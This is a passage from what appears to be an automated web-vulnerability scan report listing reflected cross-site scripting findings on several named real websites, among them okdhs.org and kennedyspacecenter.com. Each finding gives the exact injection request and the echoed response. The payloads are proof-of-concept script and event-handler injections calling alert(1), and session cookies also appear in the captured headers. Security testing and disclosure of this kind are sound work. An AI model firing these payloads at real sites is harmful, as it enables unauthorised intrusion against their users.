Set-Cookie: BIGipServerLive_Web2=234924224.20480.0000; path=/
Set-Cookie: ASP.NET_SessionId=kflu512k3sh4bm550qpncmql; path=/; HttpOnly
Set-Cookie: ss=1; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><base href="h
...[SNIP]...
<7)window.location.href=window.location.protocol+'//'+window.location.hostname+'/low'+window.location.pathname+'?aspxerrorpath=%2f3a35b'-alert(1)-'7fea7187e48.aspx' // -->
...[SNIP]...

6.61. http://www.flwoutdoors.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flwoutdoors.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b27c2<img%20src%3da%20onerror%3dalert(1)>f366bb33eee was submitted in the REST URL parameter 1. This input was echoed as b27c2<img src=a onerror=alert(1)>f366bb33eee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icob27c2<img%20src%3da%20onerror%3dalert(1)>f366bb33eee HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flwoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=8230f7e0fc8bd201af3a6b321d4141428612;path=/
Set-Cookie: JSESSIONID=8230f7e0fc8bd201af3a6b321d4141428612;domain=.flwoutdoors.com;path=/
Set-Cookie: PERSISTANCE=8230f7e0fc8bd201af3a6b321d4141428612%2ECOWEB02;domain=.flwoutdoors.com;path=/
Set-Cookie: USERCOOKIEID=05%5F03%5F2011%5F07%3A17%3A13;expires=Fri, 26-Apr-2041 01:17:13 GMT;path=/
Content-Length: 27104
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:15:41 GMT
Connection: keep-alive


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">    
   
   <html>
   <head>
       
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<span class="subhead">File not found: favicon.icob27c2<img src=a onerror=alert(1)>f366bb33eee </span>
...[SNIP]...

6.62. http://www.gemvara.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gemvara.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 5c18a--><script>alert(1)</script>c2d42aa4496 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /5c18a--><script>alert(1)</script>c2d42aa4496 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gemvara.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Set-Cookie: ARPT=YKMIMIS192.168.100.193CKOUL; path=/
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Set-Cookie: JSESSIONID=6026FD7475A30F5E2D46AA2A9B240C8C; Path=/
Set-Cookie: BrowserSession=37367945; Path=/
Set-Cookie: CustomerAccountCookie=2885689; Expires=Thu, 03-May-2012 06:54:51 GMT; Path=/
Set-Cookie: ABTesting=l-B_v-A_e-A_c-B_w-B_g-D_f-B_; Expires=Thu, 03-May-2012 06:54:51 GMT; Path=/
Set-Cookie: CustomerAccountCookie=2885689; Expires=Thu, 03-May-2012 06:54:51 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Wed, 04 May 2011 01:06:05 GMT
Content-Length: 32461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<!-- request.requestURI = /5c18a--><script>alert(1)</script>c2d42aa4496 -->
...[SNIP]...

6.63. http://www.homegauge.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homegauge.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39af8<script>alert(1)</script>b8f2b39e7b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico39af8<script>alert(1)</script>b8f2b39e7b9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homegauge.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
Set-Cookie: JSESSIONID=abcj3luCHIVFrhXCUc5_s; path=/
Content-Type: text/html
Date: Wed, 04 May 2011 03:26:30 GMT
Content-Length: 13600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equ
...[SNIP]...
<code>/favicon.ico39af8<script>alert(1)</script>b8f2b39e7b9</code>
...[SNIP]...

6.64. http://www.jif.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jif.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6a6'-alert(1)-'9e021e1a105 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico2d6a6'-alert(1)-'9e021e1a105 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jif.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<iframe src="http://fls.doubleclick.net/activityi;src=2718298;type=jifll509;cat=jifal114;u1=/Shared/FileNotFound?aspxerrorpath=%2ffavicon.ico2d6a6'-alert(1)-'9e021e1a105;ord=' + a + '?" width="1" height="1" frameborder="0">
...[SNIP]...

6.65. http://www.kennedyspacecenter.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kennedyspacecenter.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3aa"><script>alert(1)</script>14024c92ce8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4e3aa"><script>alert(1)</script>14024c92ce8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kennedyspacecenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 04 May 2011 03:10:12 GMT
Server: Microsoft-IIS/6.0
cache-control: must-revalidate
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=543dd345evw4sf45hto4g355; path=/; HttpOnly
Set-Cookie: KSCPrefs=FontSize=1; expires=Sat, 04-Jun-2011 03:10:12 GMT; path=/
Set-Cookie: KSCPrefs=FontSize=1; expires=Sat, 04-Jun-2011 03:10:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30241
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="pagehead"><!-- PageID
...[SNIP]...
<a href="mailto:?body=http://www.kennedyspacecenter.com/index.aspx&#63;404;http://www.kennedyspacecenter.com:80/favicon.ico?4e3aa"><script>alert(1)</script>14024c92ce8=1" target="_blank">
...[SNIP]...

6.66. http://www.mpsaz.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mpsaz.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bab27"><script>alert(1)</script>f3b4d1e6651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icobab27"><script>alert(1)</script>f3b4d1e6651 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mpsaz.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3-7+squeeze1
Set-Cookie: mps_architeck=5bv0bt0aro7r3im92s17hhifl1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Version: Architeck 2.1 "Your Friend in Time" (15)
X-Server: webvm6
X-Server-Time: 1304470365
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 00:52:45 GMT
Server: lighttpd/1.4.28
Content-Length: 5268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Rendered by webvm6 -->
<html xmlns="http://www.w3.org/1999/xhtml" xml:lan
...[SNIP]...
<a href="http://translate.google.com/translate?ie=UTF-8&u=http://www.mpsaz.org/favicon.icobab27"><script>alert(1)</script>f3b4d1e6651&sl=en&tl=es">
...[SNIP]...

6.67. http://www.musi-c-lips.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.musi-c-lips.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e6e79<script>alert(1)</script>354f1011bfc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoe6e79<script>alert(1)</script>354f1011bfc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musi-c-lips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:18:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e5d98c0a7a3047b8c21996ed7cacc057; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 320

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.icoe6e79<script>alert(1)</script>354f1011bfc was not found on this server.<P>
...[SNIP]...

6.68. http://www.musi-c-lips.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.musi-c-lips.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70935<script>alert(1)</script>b399bb60d6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?70935<script>alert(1)</script>b399bb60d6c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musi-c-lips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 03:18:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=b81ad29635fb7fc6f29de2f7b9e3a892; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 323

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico?70935<script>alert(1)</script>b399bb60d6c=1 was not found on this server.<P>
...[SNIP]...

6.69. http://www.okdhs.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d027'style%3d'x%3aexpression(alert(1))'4db0e9b0b84 was submitted in the REST URL parameter 1. This input was echoed as 9d027'style='x:expression(alert(1))'4db0e9b0b84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.ico9d027'style%3d'x%3aexpression(alert(1))'4db0e9b0b84 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=y331acr2ln15xfzzd3p21a55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<A title='Notify OKDHS Web Content Unit About a Broken Hyperlink' href='mailto:Webcontent@okdhs.org?Subject=ERROR: Page (location=www.okdhs.org:80/favicon.ico9d027'style='x:expression(alert(1))'4db0e9b0b84) not found'>
...[SNIP]...

6.70. http://www.okdhs.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9942'><script>alert(1)</script>8b6b78817e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?c9942'><script>alert(1)</script>8b6b78817e8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bopmnhbmcwkofxnbgy0sokaa; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<A title='Notify OKDHS Web Content Unit About a Broken Hyperlink' href='mailto:Webcontent@okdhs.org?Subject=ERROR: Page (location=www.okdhs.org:80/favicon.ico?c9942'><script>alert(1)</script>8b6b78817e8=1) not found'>
...[SNIP]...

6.71. http://www.okdhs.org/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.okdhs.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d065<script>alert(1)</script>153e79ba33e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?2d065<script>alert(1)</script>153e79ba33e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okdhs.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bhjjes45nu0yg155yjaif1nv; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>OKDHS 404
...[SNIP]...
<b>www.okdhs.org:80/favicon.ico?2d065<script>alert(1)</script>153e79ba33e=1</b>
...[SNIP]...

6.72. http://www.quantumjumping.com/contact [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 527ee"><script>alert(1)</script>50d3281d89a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact527ee"><script>alert(1)</script>50d3281d89a HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=81389463.1304488437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=81389463.1818014342.1304488437.1304488437.1304488437.1; __utmc=81389463; __utmb=81389463.2.10.1304488437

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:56:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/contact527ee"><script>alert(1)</script>50d3281d89a" />
...[SNIP]...

6.73. http://www.quantumjumping.com/contact/view [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 520b9"><script>alert(1)</script>ce7efd0b833 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact520b9"><script>alert(1)</script>ce7efd0b833/view?tag=account&limit=5&title=Members+Area+and+Passwords HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:57:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/contact520b9"><script>alert(1)</script>ce7efd0b833/view?tag=account&limit=5&title=members+area+and+passwords" />
...[SNIP]...

6.74. http://www.quantumjumping.com/contact/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d05f"><script>alert(1)</script>2287f8c60c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/view9d05f"><script>alert(1)</script>2287f8c60c2?tag=account&limit=5&title=Members+Area+and+Passwords HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:58:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 95799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/contact/view9d05f"><script>alert(1)</script>2287f8c60c2?tag=account&limit=5&title=members+area+and+passwords" />
...[SNIP]...

6.75. http://www.quantumjumping.com/contact/view [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /contact/view

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload e61d8<script>alert(1)</script>34c5233e77f was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/view?tag=account&limit=5&title=Members+Area+and+Passwordse61d8<script>alert(1)</script>34c5233e77f HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r6oc19s27qfja08ifkq36usg06; __utmx=81389463.00014672151346750314:4:0; __utmxx=81389463.00014672151346750314:3113339:2592000; __utmz=109405658.1304488444.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=109405658.384971914.1304488444.1304488444.1304488444.1; __utmc=109405658; __utmb=109405658.1.10.1304488444; __qca=P0-115106725-1304488446007

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 00:55:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 8157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
               <script type="te
...[SNIP]...
<h1 style="text-align:center;">Members Area and Passwordse61d8<script>alert(1)</script>34c5233e77f</h1>
...[SNIP]...

6.76. http://www.quantumjumping.com/customers/support/article [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quantumjumping.com
Path:   /customers/support/article

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 534e3"><script>alert(1)</script>cc90e15a4bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customers534e3"><script>alert(1)</script>cc90e15a4bf/support/article?id=1343 HTTP/1.1
Host: www.quantumjumping.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/contact/view?tag=account&limit=5&title=Members+Area+and+Passwords
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
